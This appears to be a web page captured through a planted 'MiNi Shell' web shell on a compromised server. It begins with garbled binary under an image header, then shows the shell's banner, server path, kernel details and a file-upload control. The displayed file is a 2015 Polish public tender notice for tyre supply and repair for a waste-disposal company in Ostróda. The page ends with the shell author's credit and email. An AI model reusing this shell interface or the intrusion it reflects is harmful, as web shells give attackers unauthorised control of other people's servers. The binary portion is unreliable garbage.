JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150227/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150227/43754-N-2015.html

<p class="kh_header"><b>Ostróda: Dostawa nowych opon oraz serwis i naprawa ogumienia w pojazdach znajdujących się w dyspozycji  Zakładu Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 43754 - 2015; data zamieszczenia: 27.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Unieszkodliwiania Odpadów Komunalnych Rudno Sp. z o.o. , ul. Stępowskiego 10, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 89 644 12 44, faks 89 648 41 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zuokrudno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa nowych opon oraz serwis i naprawa ogumienia w pojazdach znajdujących się w dyspozycji  Zakładu Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Przedmiot zamówienia
Przedmiotem zamówienia jest zakup nowych opon oraz serwis i naprawa ogumienia pojazdów samochodowych znajdujących się w dyspozycji Zakładu Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o.  ( dalej jako: Pojazdy), których aktualny wykaz stanowi Załącznik Nr. 6 do SIWZ. 
Zamawiający zastrzega możliwość zmniejszenia lub zwiększenia ilości Pojazdów objętych przedmiotem zamówienia w ramach maksymalnej wartości zamówienia. W takiej sytuacji, Wykonawcy nie przysługują żadne roszczenia z tytułu zmiany zakresu i przedmiotu zamówienia.

3.	Warunki realizacji napraw:
1.	Zakres rzeczowej obsługi technicznej przedmiotowego zamówienia obejmuje:
1)	dostawę opon i kół (opon z felgą), zgodnie z zaleceniami producenta Pojazdu, po wcześniejszym uzgodnieniu z Zamawiającym, 
2)	serwis i naprawa ogumienia tj. 
a)wymianę opon z wyważeniem (zdjęcie koła, zdjęcie opony, założenie opony, wyważenie koła, zamontowanie koła),
b)wymianę i wyważenie koła z felgą stalową, aluminiową,
c)naprawę - wulkanizację opony (zdjęcie koła, zdjęcie opony, naprawa lub wymiana opony, założenie opony, wyważenie koła, założenie koła),
d)naprawę uszkodzonej felgi (zdjęcie koła, zdjęcie opony, naprawa felgi, założenie opony, wyważenie koła, założenie koła), według cennika wykonawcy, 
e)demontaż zużytej opony, akcesoriów i materiałów wynikający z napraw oraz ich utylizacja,
4)przechowywanie i konserwację opon/kół w okresach ich wymiany z letnich na zimowe oraz zimowe na letnie,
5)kontrolę zużycia ogumienia na każdorazowe żądanie Zamawiającego.
2.	Za opony/koła Zamawiającego pozostawione na przechowanie u Wykonawcy odpowiada Wykonawca. Opony będą przechowywane zgodnie z zaleceniami producentów opon/kół.
3.	Wykonawca zobowiązany jest do zawarcia na własny koszt odpowiednich umów ubezpieczenia z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi, oraz od odpowiedzialności cywilnej na czas realizacji usług objętych umową.
4.	Jeżeli termin, na który została zawarta polisa (lub inny dokument) ubezpieczenia, kończy się w okresie realizacji zamówienia, Wykonawca winien bez wezwania Zamawiającego przedłożyć uaktualnioną polisę (lub inny dokument) ubezpieczenia Zamawiającemu w terminie 15 od daty ustania ważności poprzedniej polisy.
5.	Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości Pojazdów objętych usługą zgodnie z zakresem pkt 1, z zachowaniem cen jednostkowych z zastrzeżeniem, że wartość umowy wynikająca z wartości brutto wybranej oferty nie może zostać przekroczona.
6.	Zamawiający jest uprawniony do odebrania opon/kół w każdym czasie, po uprzednim telefonicznym powiadomieniu Wykonawcy minimum na 1 dzień przed terminem.
7.	Usługa naprawy ogumienia będzie wykonana przez Wykonawcę w ciągu 2 godzin od chwili podstawienia Pojazdu przez Zamawiającego do warsztatu/zakładu. W celu wykonania usług Zamawiający ustali termin rozpoczęcia jej wykonania telefonicznie lub mailowo, jednak termin przyjęcia Pojazdu w celu wykonania usługi nie może być dłuższy niż 12 godzin od chwili zgłoszenia, z zastrzeżeniem zapisu pkt. 12.
8.	Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu na każde jego
żądanie pisemnych informacji o wykonanych usługach. Po każdorazowej sezonowej wymianie kół,	Wykonawca przedstawi zbiorczy raport o stanie ogumienia Pojazdów z uwzględnieniem ilości i rodzaju przechowywanych opon.
9.	Wykonawca zapewni części zamienne w zakresie akcesoriów gumowych i materiałów eksploatacyjnych niezbędnych do prawidłowego wykonania przedmiotu zamówienia. Każdorazowo na żądanie Zamawiającego Wykonawca zobowiązany będzie do udostępniania aktualnie obowiązujących u Wykonawcy cenników usług lub faktury zakupu
10.	Wykonawca przed dokonaniem przez Zamawiającego zakupu opon/kół  przedstawi Zamawiającemu co najmniej 3 oferty na daną dostawę opon/kół. Zamawiający dokona wyboru jednej z przedstawionych ofert. Cena opony/koła zostanie pomniejszona o stały rabat.
11.	Wykonawca zobowiązuje się do stosowania przy wykonywaniu usługi, fabrycznie nowych opon/kół, części zamiennych, akcesoriów gumowych i materiałów eksploatacyjnych zalecanych przez producenta Pojazdu. Każdorazowy nowy zakup, wymaga wcześniejszej zgody Zamawiającego. 
12.	Wykonawca zobowiązuje się przyjmować do awaryjnej obsługi Pojazdów Zamawiającego w miarę możliwości w pierwszej kolejności przed innymi klientami Wykonawcy w możliwie najkrótszym terminie (nie dłuższym jednak niż 1 godzina robocza).
13.	Za dokonane czynności przy serwisie ogumienia Wykonawca wystawi fakturę nie częściej niż 1 raz w miesiącu, z zastrzeżeniem zapisu ust.14 pkt 3). Podstawą wystawienia faktury będą protokoły odbioru wykonanych usług.
14.	Sezonowa wymiana opon/kół odbywać się będzie według następujących zasad:
1)	usługi będą wykonywane sukcesywnie w terminach uzgodnionych telefonicznie przez strony, jednak nie dłużej niż w ciągu 3 dni roboczych od zgłoszenia.
2)	Zamawiający wymaga, aby sezonowa wymiana kpl. opon/kół została wykonana w ciągu 1 godziny od momentu podstawienia samochodu.
3)	Po każdorazowej sezonowej wymianie opon/kół, Wykonawca wystawi fakturę za wykonaną usługę, wraz z załącznikiem, który będzie zawierał następujące informacje: nr	rejestracyjny samochodu, rodzaj wykonanych czynności (tj. przechowywanie sezonowe koła, opony lub felgi, wymiana opony z wyważeniem, wymiana i wyważenie kół), ilość, cena jednostkowa netto, wartość netto.
4)	Każdorazowe prawidłowe wykonanie usługi zostanie potwierdzone protokołem odbioru Pojazdu bez uwag i zastrzeżeń ze strony Zamawiającego, który powinien być wydany i podpisany przez obie strony w chwili odebrania Pojazdu przez Zamawiającego.

4.	Termin wykonania zamówienia:

Wymagany termin wykonania zamówienia: od dnia zawarcia umowy do 31.03.2016r. lub do wcześniejszego wykorzystania środków finansowych przeznaczonych na realizację zamówienia w wysokości maksymalnej: 250 000 zł netto, słownie (dwieście pięćdziesiąt tysięcy złotych 00/100 netto).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełnienia tego warunku. Zamawiający dokona oceny spełnienia warunku wskazanego w § 4 ust. 1 pkt 1) SIWZ dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania na podstawie oświadczenia o spełnieniu powyższego warunku zgodnie z art. 22 ust.1 Pzp, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu oceny spełnienia tego warunku. Zamawiający dokona oceny spełnienia warunku wskazanego w § 4 ust. 1 pkt 2) SIWZ dotyczącego  posiadania wiedzy i doświadczenia, na podstawie oświadczenia o spełnieniu powyższego warunku zgodnie z art. 22 ust.1 Pzp, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek wskazany w § 4 ust. 1 pkt 3) dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż:

a)	w zakresie potencjału technicznego: dysponuje  lub będzie dysponować, narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do należytej realizacji przedmiotu zamówienia, w tym co najmniej: 1 ( jednym) stanowiskiem do naprawy ogumienia oraz  dysponuje co najmniej 1 (jednym) zakładem  naprawczym/warsztatem zlokalizowanym w odległości do 25 km od siedziby Zamawiającego (liczonej najkrótszą droga publiczną zezwalającą na przejazd samochodów ciężarowych o masie całkowitej powyżej 3,5 tony);
oraz złoży oświadczenie o spełnieniu powyższego warunku według wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie dysponowania  osobami zdolnymi do wykonania zamówienia:. Zamawiający odstępuje od opisu sposobu oceny spełnienia tego warunku. Zamawiający dokona oceny spełnienia warunku wskazanego w § 4 ust. 1 pkt 3) SIWZ dotyczącego dysponowania  osobami zdolnymi do wykonania zamówienia  na podstawie oświadczenia o spełnieniu powyższego warunku zgodnie z art. 22 ust.1 Pzp, sporządzone zgodnie z wzorem stanowiącym Załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	warunek wskazany w § 4 ust. 1 pkt 4) dotyczący znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zostanie spełniony jeżeli Wykonawca wykaże, iż posiada opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia oraz złoży oświadczenie o spełnieniu powyższego warunku według wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Kompletna Oferta musi zawierać:
a)	Formularz Oferty, sporządzony na podstawie wzoru stanowiącego Załącznik nr 1 do niniejszej SIWZ,
b)	Wszystkie oświadczenia, wykazy, dokumenty i zaświadczenia wymienione w § 5 SIWZ, zgodnie z załącznikami do SIWZ.
c)	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpadu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - oferowany w wysokości procentowej rabat na ceny za materiały eksploatacyjne i nowe opony - 20</li>
<li>3 - Cena brutto  naprawy( jednej)opony, przez którą na potrzeby oferty należy rozumieć naprawę poawaryjną 1( jednej) opony z 1( jednym) uszkodzeniem - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje możliwość zmiany do umowy w przypadku:
1)	zmiany przepisów prawa powszechnie obowiązujących, które będą miały wpływ na realizację umowy,
2)	zmian formalno-organizacyjnych,
3)	zmiany obowiązującej stawki podatku VAT. Jeśli zmiana stawki podatku VAT będzie po-wodować zmniejszenie lub zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,4)	w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych, tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuokrudno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamawiającego Zakład Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o. ul.Stępowskiego 10,14-100 Ostróda.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2015 godzina 10:00, miejsce: Biuro Zamawiającego Zakład Unieszkodliwiania Odpadów Komunalnych RUDNO Sp. z o.o. ul.Stępowskiego 10,14-100 Ostróda.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com